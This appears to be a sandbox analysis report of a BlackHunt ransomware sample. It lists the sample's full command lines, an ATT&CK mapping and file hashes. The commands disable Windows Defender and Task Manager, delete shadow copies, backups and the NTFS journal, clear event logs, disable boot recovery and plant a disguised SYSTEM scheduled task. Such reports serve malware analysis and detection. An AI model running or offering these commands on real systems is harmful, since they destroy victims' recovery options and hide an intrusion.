C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1116
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4448
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1220
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4696
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1404
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3380
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:6316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1232
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:6724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:400
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:7048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:8980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4452
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:8988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1268
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:7328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1820
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:9932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe" /F2⤵
- Modifies registry class
PID:1400 -
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe" /F3⤵
- Creates scheduled task(s)
PID:7372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4044
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1168
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:10136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2400
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4836
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4288
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:7476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:556
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1752
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4416
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:10168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2644
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:9588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3484
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:14300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3992
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:15640
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
PID:15440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:15560
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
PID:16136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:15460
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
PID:16248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3672
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:15812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:15368
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:15916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:15376
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:13560
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:15792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:15904
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:17084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:16332
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:17076
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\302519d76407f57d7db43e1af1bb7379d63ba995aa0e9310c3af3b259510637a.exe"2⤵PID:16580
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:17068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:16388
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:7456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:8124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:16348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:16228
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:15724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:16076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:16124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:14340
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:15532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:15664
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:6000
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:9804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:15684
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:3496
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Modifies registry class
PID:656
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:10380
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:16420
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:13088
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:14076
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:16396
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:17160
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:17352
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:16992
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:16980
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
PID:17008
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:17172
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
PID:15980
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
PID:15500
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵PID:13524
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:9940
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵PID:13532
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58413a8704f60f4872a0d5cbf883a5e25
SHA1f02dea4b99376fef728433969bdee1e88d994764
SHA25689837994fcb99787e08be70413316d513c2db37cdbea80fc4bab37273b6ee2b7
SHA51274c2017cdbecc96184709a214602eae059639add6d217310032c0d1bbf5e5467a1d0674977acefa0b7fde531f79684c60cf59910afb988374ce20053905919f2
-
Filesize
12KB
MD5855327e9f24fa410bfa444f557783528
SHA1e7ca840e6e076d75a9b0af521c4a611daf4b1698
SHA256081cd01092456552c0336e0f2fa4b2f653db2221a52172ef78bb0894cf14da5a
SHA5128d7eb1905d285096e8c9e912d917535f0cfe8e92b499de474d5c32d366d672c704ca402e8df70cdd0207283a01b112e63b239507bfdc683e44adce14f289d5a3
-
Filesize
684B
MD5775c2593c6e462fc33a248d14f626702
SHA1bc620300af8868a27cf80a434673a922ba1c6004
SHA2566966dfd7bd12a31a9e205a4aa1e7c00b43787dbbad69225875c4fc4f0b5e12fe
SHA5120653b6ebac01ef775d045a5cf2048f6e0905357d2fbc161bb75462d2a204b9405ac7e6a0fac23fd2a79f0538ba18b32e8486d9cbe47fa64d5b5b37868e526539